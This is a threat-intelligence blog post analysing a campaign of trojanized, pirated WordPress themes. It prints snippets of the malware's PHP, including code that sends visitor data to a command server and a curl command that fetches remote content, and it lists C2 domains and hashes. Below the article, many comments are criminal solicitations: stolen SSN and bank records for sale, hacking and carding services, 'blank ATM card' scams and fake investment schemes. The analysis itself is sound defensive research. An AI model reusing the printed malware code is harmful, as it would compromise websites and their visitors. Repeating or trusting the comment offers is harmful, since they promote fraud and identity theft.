Wednesday, February 19, 2020

PHP’s Labyrinth - Weaponized WordPress Themes & Plugins

Overview

Prevailion’s Tailored Intelligence team has followed an active supply chain attack that has been ongoing since late 2017, we named this campaign “PHPs Labyrinth.” In this operation, threat actors have been able to surreptitiously install malicious files into a large number of Premium WordPress Themes and Plugins. We assess that the responsible party chose to target WordPress as it makes up 60% of all Content Management systems, and 34% of all websites on the internet. WordPress themes and plugins allow the average person to quickly and easily create a website through “drag and drop” features, rather than coding an entire website themselves.

The nefarious actor took advantage of an increased demand for premium themes, and managed to distribute them to various end-users through the use of specific WordPress marketplace platforms. These marketplace platforms were created by the threat actor; we were able to discover 30 different platforms used to distribute the trojanized themes and plugins. Three of the most popular webpages on these platforms were;
      “Ultimate Support Chat” with approximately 700k views
      “Woocomerence Product filter” with approximately 175k views and
      “Slider Revolution v5.4.8.1” with approximately 125k views.

Thus far Prevailion has been able to identify over 20k actively compromised web servers worldwide, that are displaying evidence of compromise. This data is currently available on the Prevailion Apex platform. Based upon the number of views from the malicious platforms, we speculate that the total number of infected webservers is likely much higher, potentially in the hundreds of thousands. Due to the pandemic nature of this threat, Prevailion coordinated their efforts with appropriate U.S law enforcement on this campaign.

The attack commences when an unsuspecting victim uploads a trojanized theme to their web server. References to those trojanized files date back to stack overflow posts from October 2017. Once all the malicious files are downloaded, the threat actor gained full control over the web server - allowing them to add an administrative account, recover the web admin’s email account and WordPress password hash. If the password was recovered, from the hash and was used for multiple accounts, it could allow access to corporate resources.

In most cases we assess that the web servers ultimately became part of the Propeller Ads advertising network. Additional research shows that the Propeller Ads network has been associated with a plethora of malicious activity from different threat actors, including but not limited to malvertising and the Fallout exploit kit. This ad network is manipulated by attackers to become the contagion vector, allowing threat actors to remotely post malicious ads on otherwise benign websites. The malicious ads run javascript files, and surreptitiously install malware on victimized machines. If successful, this technique could allow the threat actor to steal usernames, passwords, and private files from victims' computers.

WordPress Malware

PHP’s Labyrinth Campaign Walk Through

Infection source

The Prevailion team has been able to identify 30 platforms that served trojanized WordPress Themes. The most prominent websites appeared to be called Vestathemes.com. The website description states that they offer “Thousands of free nulled, [a.k.a. pirated] WordPress Themes and Plugins.” When analyzing this cluster of WordPress platforms we observed a number of irregularities that make us believe they were fictitious, and managed by the same entity. For instance, sites had broken links to social media icons that took the visitor right back to the homepage, furthermore all the suspicious websites appeared to use the same template. 

Screenshot of Vestatheme.com and null5.top website

To supplement this claim; in at least one instance the threat actor created domain, null24[.]icu, displayed the page header saying, Nulledzip[.]download, which is one of the other websites. That domain, nulledzip[.]download, was also flagged in a Digital Millennium Copyright Act takedown notice that can be found here.

Based off our analysis we have identified the following 30 websites that correlate to this cluster;
      Null5[.]top,
      Freedownload[.]network,
      Downloadfreethemes[.]io,
      Themesfreedownload[.]net,
      Downloadfreethemes[.]co,
      Downloadfreethemes[.]pw,
      Wpfreedownload[.]press,
      Freenulled[.]top,
      Nulledzip[.]download,
      Download-freethemes[.]download,
      Wpmania[.]download,
      Themesdad[.]com,
      Downloadfreethemes[.]download,
      Downloadfreethemes[.]space,
      Download-freethemes[.]download,
      Themesfreedownload[.]top,
      Wpmania[.]download,
      Premiumfreethemes[.]top,
      Downloadfreethemes[.]space,
      Downloadfreethemes[.]cc,
      Freethemes[.]space,
      Premiumfreethemes[.]top,
      Downloadfreenulled[.]download,
      Downloadfreethemes[.]download,
      Freethemes[.]space,
      Dlword[.]press,
      Downloadnulled[.]pw,
      24x7themes[.]top,
      null24[.]icu

Loader

The “class.theme-module.php” or “class.plugin-modules.php” file is the operative file that was added to the all the trojanized themes. The threat actor added functionality that allows for the command and control node to be changed to a “newdomain” periodically. The next function obtains a “$wp_auth_key” from one of the 1st stage C2s. Afterward it then writes the contents of the 1st stage C2 with the URL of code.php to a file called “wp-tmp.php”. The malware would perform host based reconnaissance and attempts to enumerate the following directories:

upload
cli
media
template
uploads
components
modules
Images
img
includes
plugins
Css
administrator
language
tmp
js
admin
layouts
upgrade
image
Bin
libraries
engine
file
cache
logs
templates
files
wp-admin
wp-content
wp-includes


Next it checks to see if certain files exist; such as post.php, wp-vcd.php, if not it creates them on the system. It then copies the “WP_CD_Code” function to “wp-vcd.php”. This is the file that seems to have drawn the most attention over the past few years, and has been mentioned on WordPress web forums. The wp-vcd.php file copied the malicious code from the file “class.theme-modules.php” that was previously discussed.

Then it scans for a file named functions, if that file exists it will run “file get contents” on the 1st stage C2, HTTP_HOST, Password and Install hash.
One such command GET request would look like this
http://www.trilns.com/o.php?host=www.compromiseddomain.com&password={MD5hash} 

Previously employed code will then repeat the process and iterate over two other domains with different generic Top-Level domains (gTLDs). We suspect that these domains serve as backup communications channels in case an issue arose with the primary domain. An example of the three URLs used in the December campaign were:
      hxxp://www.vrilns[.]com/code[.]php
      hxxp://www.vrilns[.]pw/code[.]php
      hxxp://www.vrilns[.]top/code[.]php

Once the code creates the new wp-vcd.php file, it then deletes the file class.theme-module.php.
In this section we’ll examine the three files that were previously made by the loader script. Note that some of the files will be discussed throughout the report, in this section we show the files as they appear after the loader module was run once.

Newly Observed Shift in Tactics

We observed the threat actor altering their tactics, techniques and procedures (TTPs), starting in late December 2019 after a report detailing aspects of this activity was reported by another security firm. The most recent threat actor domain registered was frilns[.]com which used Alidns, Alibaba Cloud DNS, instead of CloudFare. The threat actor also no longer relied upon CloudFare hosting services and seemingly moved all the domains to a single IP address 94[.]156[.]175[.]170. One more change is that the threat actor removed the secondary and tertiary communications channels during the December to January 2020 timeframe. 

1st Stage

At this point we see the threat actor taking action from their 1st stage server, adding code to the existing files on the compromised machine. One modified file was functions.php, the threat actor added a line of code to top of this file that would run the wp-vcd.php file. The next file modified was wp-tmp.php, as mentioned above this file contains an WP_AUTH_Key.  It was here that we took note of two additional sections of code.

The first section downloads additional code and adds it to the top of functions.php from a 1st stage C2. An example of this:

$file=file_get_contents(get_template_directory().'/functions.php'); $filec=file_get_contents(get_stylesheet_directory().'/functions.php'); $rep="pacocs.top"; $repw="pacocs.xyz"; if (stripos($file,$rep) !== false) { $new_file=str_replace($rep,$repw,$file); @file_put_contents(get_template_directory().'/functions.php',$new_file); } if (stripos($filec,$rep) !== false) { $new_filec=str_replace($rep,$repw,$filec);

The second section of code adds a persistent cookie called “wordpress_cf_adm_use_adm” to anyone who visits the website - however the cookie would only be added to users who came to the website from one of the following search engines:
      Google,
      Yahoo,
      Yandex,
      MSN,
      Baidu,
      Bing
      DoubleClick.

The cookie includes the referring search engine, as well as a reference to the compromised domain that was visited, and is set to persist for 1000 days. Once the cookie was attached to the end-user, their IP address is added to a list that lives in the file called “wp-feed.php.” The code used by the threat actor appears to slightly modify code that was found on another WordPress forum, that talked about how to target visitors of your site from search engines.

New Administrative Account

In order to ensure continued access to the infected websites, they also added an administrative account. This account allows them to simply log back into the website (with administrative privileges) at any time to alter any files. There was one variant of this malware reported by Astra, where the threat actor would create the username “wpadmin”. More recent reporting from Medium indicated that the threat actor kept this feature but  switched to utilizing a different username of “100010010”.

2nd Stage

Functions.php

We came back to the functions.php file to analyze the new code added during the last step. The new segment of code sets the max upload and post size to 128 Megabytes. It also specified that if the code took longer than 600 seconds to execute, it should stop. We hypothesize that these features were added to ensure their activity was not detected, as a hung process would be more likely to cause problems and be investigated by a responder.
            @ini_set( 'upload_max_size' , '128M' );
@ini_set( 'post_max_size', '128M');
@ini_set( 'max_execution_time', '600' );

Next it will obtain the IP address, bot number, pack and user-agent string of the compromised machine and send them to a threat actor controlled C2.

$result=get_url(implode("",$hoho)."/logs/dolodos.php?url=".urlencode("http://".$server_host.$_SERVER["REQUEST_URI"])."&ref=".urlencode(@$_SERVER["HTTP_REFERER"])."&ip=".checked_ip()."&bot=$bot_num&pck=$pck&uagent=".urlencode($_SERVER["HTTP_USER_AGENT"])); hxxp://dolodos[.]top
system("chmod 755 $red_domain_path;curl -s http://piasuna[.]gdn/gen/actual_domain_my.php?pck=$pck | base64 > $red_domain_path");

After identifying the URL pattern we were able to find another live C2 domain through Google, vosmas[.]icu/gen/actual_domain_my.php?pck=ip8.

Google Search for the URL path found in the deobfuscated functions.php file

Through our efforts we were able to identify the following domains:
      vosmas[.]icu                                                               
      tdreg[.]icu
      tdreg[.]top
      medsource[.]top
      tretas[.]top
      piastas[.]gdn
      pervas[.]top
      vtoras[.]top
      dolodos[.]top
      piasuna[.]gdn
      semasa[.]icu
      vosmas[.]icu
      devata[.]icu

One notable aspect - some of these domains such as medsource[.]top simply contain instructions that redirect the output to tdreg[.]icu. So we suspect that some of the domains may act as relays for the tdreg[.]icu domain


Below this code there was another copy of the “WP_CD_Code” code that was referenced in the loader section of this report. We believe the threat actor copied this code to numerous files as a secondary means of persistence, in the event that one file is deleted by the systems administrator they retain access to the compromised wordpress domain. 

Wp-tmp.php - Search Engine Optimization (SEO) component

This group calculated all the angles when it came to manipulating searches - another calculated effort was to raise the Search Engine Optimization (SEO) profile of the sites they controlled, creating a cost-effective means to draw more “clicks” and use that as a cost effect leverage to proliferate. To accomplish this, they run a series of commands on the compromised websites in order to enumerate the individual site. This included three functions for commands:
      case 'get_all_links'
      ‘set_id_links'
      case 'create_page'

The first command obtains a list of the posts on a compromised wordpress site. The second command allows the attacker to add web links to existing web pages. The third command enables them to create new web pages on the compromised domain. In one file, the threat actor added links to one of the newly-controlled market places, offering their premium nulled themes. This was likely done to raise the SEO of these websites, ensuring they get more downloads and ultimately, more infections. 

The functionality in this section appeared to closely mirror code found on another stack-overflow post, where the incident responder claimed to find the snippet saved in the file “post.php.” This is where the attackers can also add “keywords” to make the website more popular, likely in an attempt to raise the websites profile so it could display more ads. As noted by other researchers, in previous reporting this aspect of the campaign utilized the domain *.spekt[.]pw. The advertising component will be explained in the section below.

Ad-Blocker Script

In more recent versions of wp-tmp.php, there was a PHP script that would serve as an Anti- AdBlocker and was used through at least September 2019. This allows the website to display ads on the visited webpage, even if the end-user was using a program such as “Ad-Blocker”. Based upon lexicon analysis of the code found in the sample, the script appeared to be a slightly modified version of PHP code found on this web forum post from 2017.

Javascript - Advertising network

After the Ad-Blocker code, there is a line for a function called “slider_option” used to make asynchronous requests to two JavaScript files hosted on remote servers. These hostnames correspond to the advertising service Propeller Ads. Propellers Ads is an online ad service where various end users can bid to have their ads displayed on an otherwise begin website. While this has become a standard marketing technique, unfortunately it can also be abused by threat actors with more nefarious intentions. In order to ensure the correct person receives the advertisement revenue for displaying the ads, the accounts are identified by their zoneid.  

A copy of the javascript used to invoke the ads is displayed below:
<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1558098&interactive=1&pushup=1"></script>
<script src="//defpush.com/ntfc.php?p=1565632" data-cfasync="false" async></script>';

Propeller Ad Network

Generating Money through Advertisements 

Once the WordPress website was compromised, the threat actor appeared to be interested in generating revenue through the Propeller Ads network. While the propeller ad network presents itself like any other ad network, they have had a history of being used by criminal organizations for malicious purposes. Their extensive run history with various computer security firms resulted in an article being written about these activities by TechTarget in 2017.

Malvertising

Malvertising is when threat actors are able to display malicious ads, and run remote javascript files on otherwise benign websites. Cisco wrote a comprehensive report on advertising and malvertising last year that explains the marketing aspects of how paid advertising works. For those that are unfamiliar the client could chose a plan and would pay:
      Every time the advertisement is shown (pay per impression)
      Every time the advertisement is clicked (pay per click)
      Every time the advertisement is shown, clicked, and something is ordered from the website (pay per order)

During the course of our investigation we visited a compromised domain and got the following URL. We have removed the domain and cep string from the URL to avoid identifying the victim.

https://{compromised-Domain}/testomaster-br.php?cep={string}&widget_id=5633835s733669&teaser_id=2497610&click_id=49d0d459e09b42d26f378dea3140b06f&category_id=145&campaign_id=480469&click_price=0.005

From this example, we determined that the threat actor was receiving half a cent every time someone would click on the advertisement. In numerous cases, the advertisements were completely benign and would direct the end user to a legitimate service or website. In other cases however, we observed pop-up ads prompting the user to download potentially unwanted programs (PUP) or sometimes called Adware. These redirections could occur from a user clicking on a box to “allow notifications” or in some cases just clicking URLs embedded within the website. In one instance, we clicked on the “about us” link and received a pop up like the one below. 

“Flash Player Update” Malvertising for Windows 10 machines from uniqueapps[.]app

In other cases the advertisements don't look like advertisements at all, and mimic “Software Updates”.

“Software Update” Malvertising for OSX machines from tharbadir[.]com

If an end user clicks on the pop-up advertisement, it could install the potentially unwanted program on their local machine. Once on the local machine, these programs can continue to redirect the victim’s web browser to certain websites or even download additional malware from the internet.

Fallout Exploit Kit

The Nao Security’s twitter account, stated that they observed propeller ads redirect victims to domains associated with the Fallout Exploit Kit.

            Image was created by Nao’s Security and posted on twitter - showing propellerads.php redirecting to an exploit kit

In addition to the screenshot above, other security firms such as FireEye have previously noted the Fallout Exploit Kit being propagated to victims through advertising networks. They noted that the victim would likely be served either a malvertising pop up, similar to those in the previous section, or connected to the exploit kit based upon the browser profile from the user-agent string and potentially the location of the victim. If the browser was successfully exploited by the kit, Viriback noted that it appeared to drop a variant of Zloader. The zloader agent has historically been used to further download additional payloads.

Compromise Intelligence Details

Once Prevailion was able to identify the command and control nodes associated with this particular campaign, we collected the associated telemetry information. We then cleaned the data using proprietary algorithms, thereby reducing bias and the rate of false positives. This refined data is called Evidence of Compromise (EoC), which allows us to create a global contagion snapshot representing a portion of impacted organizations. The map below denotes organizations that present EoC associated with PHP’s Labyrinth compromised web servers.

Prevailion Global Contagion Snapshot of EoC.

Based upon our telemetry, affected organizations are spread across a multitude of countries and sectors. As is typical with supply chain attacks, there was no clear targeting of any one individual sector, and so the resulting contagion map shows victimology that reflects largely upon the popularity of WordPress. Based upon our findings, we identified that small to medium sized businesses accounted for more than a fifth of all compromised entities, as they are the primary customers of premium third-party themes. This is most likely due to the fact that many lack the necessary funding or human capital to build a completely custom website, unlike larger, more established firms.

Additionally, we identified a number of more prominent victims, including but not limited to:
      A decentralized crypto-mining website
      A U.S. based stock trading firm
      A small U.S. based bank
      A government run petro/chemical organization
      A U.S. based insurance company
      A large U.S. based manufacturer
      A U.S. payment card solution organization
      A U.S. based IT services organization

While compromises of smaller third parties may first appear a nuisance, these instances can actually become quite dangerous later on down the road. Larger organizations typically have more money to invest in their cyber defense programs, so it becomes much easier to launch a campaign through a supply chain vendor, than it would be to directly attempt to infect a larger corporation. If left undetected, threat actors can use these initial infections to pivot, and affect larger organizations through their smaller, less defended third parties.

Mitigations

In order to protect against the WordPress malware, we recommend against using any pirated, a.k.a nulled, software. Organizations should instead utilize either open-source software or pay for premium themes. If your organization’s web server is running windows based operating systems, we recommend enabling and updating Windows Defender.

The default WordPress passwords are stored in their current state as a hybrid of MD5 hashes and PHP Pass, which are proven vulnerable to collision attacks. Through recovery of the username and MD5 hash, an attacker could find a collision offline to facilitate access to the organization's corporate network. This emphasizes the problem of password reuse, which has plagued the industry. When configuring any WordPress website, we encourage web administrators to use more secure hashing algorithms, and to never reuse passwords across multiple accounts.   

In order to curtail this threat posed to end-users from people visiting these compromised websites, we recommend using a plugin like NoScript that prevents remote javascript from running on your machine. We also recommend updating to the latest operating systems and web browser. This could help protect against certain exploit kits, which are known to target outdated web browsers. If you click on a malvertising ad, we recommend scanning your computer with an up-to-date version of antivirus to minimize the impact of the threat.

Conclusion

While the problem of compromised websites is not new, it will continue to plague end users, administrators, and the internet as a whole. As WordPress becomes even more prominent, it is an evermore appealing target for attackers. To make matters worse, all end-users need to do is download one malicious theme or even one plugin to compromise the integrity of the entire web server. In one instance we have observed a verified Themeforest purchaser ask questions on support forums about the malicious files and even included references to one of the command and control domains. We then downloaded that same theme but did not see any malicious files and suspect the end user likely downloaded an plugin from a malicious platform in conjugation with the themeforest theme. 

At this time, the threat actor seems content with generating revenue off the advertising aspect of this campaign; however we cannot ignore the fact that in its present state, it has metastasized into a massive botnet, with all the potential issues that represents. This could also have far reaching impact as it gives other criminals a platform to perform malvertising and use various exploit kits to amplify their reach. We assess that exposing and countering this activity we are able impact, this activity and, other criminals we use these compromised sites as a platform to exploit various end-users having a ripple effect making everyone safer.

We believe that this campaign was able to occur for so long due to the placement of these web servers. Similar to the VPNFitler malware, these web servers are typically located outside of the companies standard perimeter. Many of these web servers are running without anti-virus software and are rarely checked except for when they go offline. This unique combination makes them an ideal target for attackers and we expect to see continued target of Web server and WordPress related software to remain a serious threat to network defenders.                     

Indicators of Compromise

1st stage domains
frilns[.]com
crilns[.]com
brilns[.]com
trilns[.]com

1st stage IP address
94[.]156[.]175[.]170

2nd stage domains
vosmas[.]icu
tdreg[.]icu
tdreg[.]top
medsource[.]top
tretas[.]top
piastas[.]gdn
pervas[.]top
vtoras[.]top
dolodos[.]top
piasuna[.]gdn
semasa[.]icu
vosmas[.]icu
devata[.]icu

FileName:class.theme-modules.php
590543e78b9526c6003ea09559983fb8b6788bf729a7ef699a8528df1ee515fc
bb4a9352f5ec15a2fef209fd30502f3f563348d245ee3e53b1defeddc61bd176
a3b97f264d1bdabc21eb7ee504f16f7afe563a83b0f0dbcaefb1fb45d7962867
A1606a7033b77185d40444ccb6571fb9c792235f69872e1d3f6c0556b84849a4
4bf619c5931a70946bad5f4f7e9954eef8820053f4e97feccb1a009ac57fde2c 
C7d60c6a28cac56b9dd2661e943da5f623d1e9da6e6f5a3cffbc7a1edb4a025f
70de1fa188414ebcf442ccdefc6873b18cb9f7e801f4af763ca057a03cd92ace

1st stage samples: 
C61f828482ca269cb76decc9b53db277057caae66b426c3b2b2473d5367c0185
dc0aafc523e5942ec8e9c6f7db172551d4836d8002747b3d9790170d01d6ffa2
385689df54ebbec8715e556d8ab1aecc8a820a32e61d7857618f12ddf5017d77
93bde6244fe499b4eb8cde8c4d79cdd3f0d151f0945ea484f2f18334346776c1
Dc0aafc523e5942ec8e9c6f7db172551d4836d8002747b3d9790170d01d6ffa2

2nd stage samples:
1eb6a47fe5e37f4ca97721ea22a0462f9b9c789af9b861ba3b0c829823101496
Dc82c31bb81040cd4202ec0d332acfb498d5d5fbc8a62ceb1585a686278852a0
62b0e263d65c837f0b36681f342d75328cb86b5b6de91116f47b5a402da4cb23
385689df54ebbec8715e556d8ab1aecc8a820a32e61d7857618f12ddf5017d77
26a3f5e50ebbcbcee43b9cf5679717a2227dcb046d666f709a4884923f6d2582
06fa326bab5330a7484a75f1af019960b1ab354fb6d7c2e8d3d0d7f4193f2f62
0506bc097ab7151caa9b2768b7c21847610c9e1d86aa656e79836b90c42f62f3
Dc82c31bb81040cd4202ec0d332acfb498d5d5fbc8a62ceb1585a686278852a0
7addff39d07857ffd2fee0779959ea3419408407ced75989a9f1e3c67dbe537a

Malvertising
17a74e5611aeb79f8443a985edbd9f44319af063cc8eda8297f207127ae706b8
fab349488ea7d99a24f7bc97f9e216b4e04e3d257cc02f25ad5b2f6629605321
6a88fb15e191eb7dd0f5efd5313c69cd8271658787bc94e618cbf9542d47686d

Zloader
712503faf40a5e21efd4f2c718674c14a83eca0d6ebe41f985a16a9218111a9f
eafbd21a0f9f082fa2e94e010569d7fa8512d978087c2633d652b865b922465a

Domains
kdsidsiadsakfsas[.]com/gate[.]php
oajdasnndkdahm[.]com/gate[.]php



52 comments:

  1. Replies
    1. Hello all
      am looking few years that some guys comes into the market
      they called themselves hacker, carder or spammer they rip the
      peoples with different ways and it’s a badly impact to real hacker
      now situation is that peoples doesn’t believe that real hackers and carder scammer exists.
      Anyone want to make deal with me any type am available but first
      I‘ll show the proof that am real then make a deal like

      Available Services

      ..Wire Bank Transfer all over the world

      ..Western Union Transfer all over the world

      ..Credit Cards (USA, UK, AUS, CAN, NZ)

      ..School Grade upgrade / remove Records

      ..Spamming Tool

      ..keyloggers / rats

      ..Social Media recovery

      .. Teaching Hacking / spamming / carding (1/2 hours course)

      discount for re-seller

      Contact: 24/7

      [email protected]

      Delete
    2. The effectiveness of IEEE Project Domains depends very much on the situation in which they are applied. In order to further improve IEEE Final Year Project Domains practices we need to explicitly describe and utilise our knowledge about software domains of software engineering Final Year Project Domains for CSE technologies. This paper suggests a modelling formalism for supporting systematic reuse of software engineering technologies during planning of software projects and improvement programmes in Final Year Projects for CSE.

      Software management seeks for decision support to identify technologies like JavaScript that meet best the goals and characteristics of a software project or improvement programme. JavaScript Training in Chennai Accessible experiences and repositories that effectively guide that technology selection are still lacking.

      Aim of technology domain analysis is to describe the class of context situations (e.g., kinds of JavaScript software projects) in which a software engineering technology JavaScript Training in Chennai can be applied successfully

      The Angular Training covers a wide range of topics including Components, Angular Directives, Angular Services, Pipes, security fundamentals, Routing, and Angular programmability. The new Angular TRaining will lay the foundation you need to specialise in Single Page Application developer. Angular Training

      Delete
    3. Selling USA FRESH SPAMMED SSN Leads/Fullz, along with Driving License/ID Number with EXCELLENT connectivity.

      **PRICE**
      >>2$ FOR EACH LEAD/FULLZ/PROFILE
      >>5$ FOR EACH PREMIUM LEAD/FULLZ/PROFILE

      >All Leads are Tested & Verified.
      >Invalid info found, will be replaced.
      >Serious buyers will be welcome & will give discounts to them.
      >Fresh spammed data of USA Credit Bureau
      >Good credit Scores, 700 minimum scores.

      Email > [email protected]
      Telegram > @leadsupplier
      ICQ > 752822040

      **DETAILS IN EACH LEAD/FULLZ**

      ->FULL NAME
      ->SSN
      ->DATE OF BIRTH
      ->DRIVING LICENSE NUMBER WITH EXPIRY DATE
      ->ADDRESS WITH ZIP
      ->PHONE NUMBER, EMAIL, I.P ADDRESS
      ->EMPLOYEE DETAILS
      ->REALTIONSHIP DETAILS
      ->MORTGAGE INFO
      ->BANK ACCOUNT DETAILS

      ->Bulk order will be preferable
      ->Minimum order 25 to 30 leads/fullz
      ->Hope for the long term business
      ->You can asked for specific states & zips
      ->You can demand for samples if you want to test
      ->Data will be given with in few mins after payment received
      ->Payment mode BTC, PAYPAL & PERFECT MONEY

      **Contact 24/7**

      Email > [email protected]
      Telegram > @leadsupplier
      ICQ > 752822040

      Delete
  2. Hey nice post man! Thanks for incredible info.
    webdesign agencies

    ReplyDelete
  3. As a home for your business, your site can feature your abilities, give subtleties of your experience, and give likely customers and clients a helpful method to connect. Fix database error

    ReplyDelete
  4. Hey Guys !

    USA Fresh & Verified SSN Leads with DL Number AVAILABLE with 99.9% connectivity
    All Leads have genuine & valid information

    **HEADERS IN LEADS**
    First Name | Last Name | SSN | Dob | DL Number | Address | City | State | Zip | Phone Number | Account Number | Bank Name | Employee Details | IP Address

    *Price for SSN lead $2
    *You can ask for sample before any deal
    *If anyone buy in bulk, we can negotiate
    *Sampling is just for serious buyers

    ==>ACTIVE, FRESH CC & CVV FULLZ AVAILABLE<==
    ->$5 PER EACH

    ->Hope for the long term deal
    ->Interested buyers will be welcome

    **Contact 24/7**
    Whatsapp > +923172721122
    Email > [email protected]
    Telegram > @leadsupplier
    ICQ > 752822040

    ReplyDelete
  5. Are you interested in trading bitcoin binary and forex trade where you can earn 100% of your investment daily If you invest as low as $200 you will get a profit of $2,000 after 72 hours if you are intrested you can contact him via email: [email protected] +12132951376(WHATSAPP)

    ReplyDelete
  6. Are you interested in trading bitcoin binary and forex trade where you can earn 100% of your investment daily If you invest as low as $200 you will get a profit of $2,000 after 72 hours if you are intrested you can contact him via email: [email protected] +12132951376(WHATSAPP)

    ReplyDelete
  7. I am looking for and I love to post a comment that "The content of your post is awesome" Great work! Unexpected response from the server

    ReplyDelete
  8. You make so many great points here that I read your article a couple of times. Your views are in accordance with my own for the most part. This is great content for your readers. dofollow blog comment

    ReplyDelete
  9. Nice one for discussing the knowledge. I recently uncovered the info tremendously valuable.url

    ReplyDelete
  10. Hi buddies, it is great written piece entirely defined, continue the good work constantly.
    UX consultant

    ReplyDelete





  11. Hello World
    I’m hacker and Services provider
    interested in any thing i do fair deals.
    I will show you each and everything to start business
    also teaching Hacking / spamming short courses
    I have all tools that you need to spam

    .. Western Union transfer
    .. Credit cards
    .. Money adders
    .. Bill paying
    .. College fee
    .. Fake documents
    .. Grade change

    Contact:

    [email protected]


    ReplyDelete
  12. I haven’t any word to appreciate this post.....Really i am impressed from this post....the person who create this post it was a great human..thanks for shared this with us. acheter des backlinks

    ReplyDelete
  13. WordPress makes creating, editing and organising your content simple and, grammarly cyber monday deals as a result, less time-consuming. That gives you more time to focus on other areas of your business.

    ReplyDelete
  14. It's a shame I've missed this event. I hope it was a productive day for you. Tell me more about it. fiverr seo

    ReplyDelete
  15. I love the way you write and share your niche! Very interesting and different! Keep it coming! nature quotes

    ReplyDelete
  16. These attributes have to be implemented smartly because posting these visual enhancements might also make your page a bit slow in loading especially if you are posting content in high definition. click here for more info

    ReplyDelete
  17. I’m excited to uncover this page. I need to to thank you for ones time for this particularly fantastic read!! I definitely really liked every part of it and i also have you saved to fav to look at new information in your site. WordPress training

    ReplyDelete
  18. Nice knowledge gaining article. This post is really the best on this valuable topic. Dofollow SEO Backlink

    ReplyDelete
  19. Very good article. Really looking forward to read more. Awesome.wordpress error establishing a database connection

    ReplyDelete
  20. This is trailed by a concise assessment of the objective market and its imperatives.besimple.com/

    ReplyDelete
  21. Thanks a lot for sharing such an informative blog.
    NIMBUS LEARNING is the one of the best GATE Online Coaching. We Provide Online Live Classes for ESE / GATE, SSC-JE. If You want know more details about Engineers Academy then you can call us at 7374000999.

    ReplyDelete
  22. Thanks for Sharing This Article.It is very so much valuable content. I hope these Commenting lists will help to my website
    blockchain online training
    best blockchain online training
    top blockchain online training

    ReplyDelete
  23. Your article has piqued a lot of positive interest. I can see why since you have done such a good job of making it interesting. quality backlink

    ReplyDelete
  24. Merely a smiling visitant here to share the love (:, btw outstanding style. manually backlinks

    ReplyDelete
  25. Interesting SEO content remaining parts ruler. Indicating your guests you can truly compose special, convincing substance, your traffic will become quick.Professional graphic design

    ReplyDelete
  26. Interesting SEO content remaining parts ruler. Indicating your guests you can truly compose special, convincing substance, your traffic will become quickubanker

    ReplyDelete
  27. Thanks for sharing such an informative blog. GATE 2021 is one of the most upcoming exam in India. Clearing the exam with a good rank not only opens up job opportunities in PSUs but also all other competitive exams. Engineers Academy provides GATE Coaching in Delhi with experience faculty members.

    ReplyDelete
  28. Great survey, I'm sure you're getting a great response. รับทำ seo

    ReplyDelete
  29. select over 510 html email templates and select the most suitable to your business. Wide range of templates available for every industry and usage. For more information visit at mailerstock.com

    ReplyDelete
  30. Hello everyone , here’s your opportunity for you to achieve your dreams of being a multi million dollar rich through trading , I once loss all I got through trading but was fortunate to come across a woman with great virtue and selfless heart (Mary ) i was introduce to her masterclass strategy while searching online which has revived me of all my losses and made me gain more and more . With her unique strategy you are entitled to daily signals and instant withdraw ,be rest assured of getting a refund of all your loss investment with any platform that has denied you in one way or the other in getting your money . Mr Payton masterclass strategy is simply the best for beginners and those that are finding it difficult to succeed through trading he’ll help you with just a simple step . Email her ([email protected]) .Remember this is absolutely free!!!

    ReplyDelete
  31. Are you interested in the service of a hacker to get into a phone, facebook account, snapchat, Instagram, yahoo, Whatsapp, get verified on any social network account, increase your followers by any amount, bank wire and bank transfer.
    I can vouch for him because I have used him to monitor my husband many time when I feel suspicious about his movements TALENTED HACKERS DO YOU REQUIRE A CERTIFIED HACKER FOR : +University grades hack, +Bank account hacks, +Control devices remotely hack, +Facebook Hacking Tricks, +Gmail, AOL, Yahoomail, inbox, hack are available, +Database hacking, +PC computer tricks +Bank transfer, Western Union, money gram, Credit Card transfer +Wiping of credit, +VPN software, +ATM Hack we are the real deal when it comes to hacking, carding, WU transfer, Money Gram transfer etc contact us now [email protected] ‪+1 (213) 295‑1376‬(whatsapp)

    ReplyDelete
  32. It was a very good post indeed. I thoroughly enjoyed reading it in my lunch time. Will surely come and visit this blog more often. Thanks for sharing. SEO

    ReplyDelete
  33. Hi, Thanks for sharing. Very informative post, that I have ever read, the strategy given is really very helpful....Here I’m giving best GATE aptitude training details, once go through it.
    GATE ONLINE COACHING

    ReplyDelete
  34. Hi, Thanks for sharing. Very informative post, that I have ever read, the strategy given is really very helpful....Here I’m giving best GATE aptitude training details, once go through it.
    GATE ONLINE COACHING

    ReplyDelete
  35. A great content material as well as great layout. Your website deserves all of the positive feedback it’s been getting. I will be back soon for further quality contents. backlinks

    ReplyDelete
  36. BE SMART AND BECOME RICH IN LESS THAN 3DAYS....It all depends on how fast 
    you can be to get the new PROGRAMMED blank ATM card that is capable of
    hacking into any ATM machine,anywhere in the world. I got to know about 
    this BLANK ATM CARD when I was searching for job online about a month 
    ago..It has really changed my life for good and now I can say I'm rich and 
    I can never be poor again. The least money I get in a day with it is about 
    $50,000.(fifty thousand USD) Every now and then I keeping pumping money 
    into my account. Though is illegal,there is no risk of being caught 
    ,because it has been programmed in such a way that it is not traceable,it 
    also has a technique that makes it impossible for the CCTVs to detect 
    you..For details on how to get yours today, email the hackers on : (
    [email protected] ). Tell your 
    loved once too, and start to live large. That's the simple testimony of how 
    my life changed for good...Love you all ...the email address again is ;
    [email protected]

    ReplyDelete
  37. Hello everyone, Are you looking for a professional trader, forex and binary manager who will help you trade and manager your account with good and massive amount of profit in return. you can contact MR. CARLOS ELLISON for your investment plan, for he helped me earned 12,000usd with little investment funds. Carlos Ellison you're the best trader I can recommend for anyone who wants to invest and trade with a genuine trader, he also helps in recovery of loss funds..you can contact him on his Email:
    [email protected]
    Via whatsapp: (+12166263236)
    Via Telegram : +12166263236

    I advice you shouldn't hesitate. He's great.

    ReplyDelete
  38. GET RICH WITH BLANK ATM CARD ... Whatsapp: +18033921735

    I want to testify about Dark Web blank atm cards which can withdraw money from any atm machines around the world. I was very poor before and have no job. I saw so many testimony about how Dark Web hackers send them the atm blank card and use it to collect money in any atm machine and become rich. ( [email protected] ) I email them also and they sent me the blank atm card. I have use it to get 90,000 dollars. withdraw the maximum of 5,000 USD daily. Dark Web is giving out the card just to help the poor. Hack and take money directly from any atm machine vault with the use of atm programmed card which runs in automatic mode.

    Email: [email protected]
    Text & Call or WhatsApp: +18033921735

    ReplyDelete
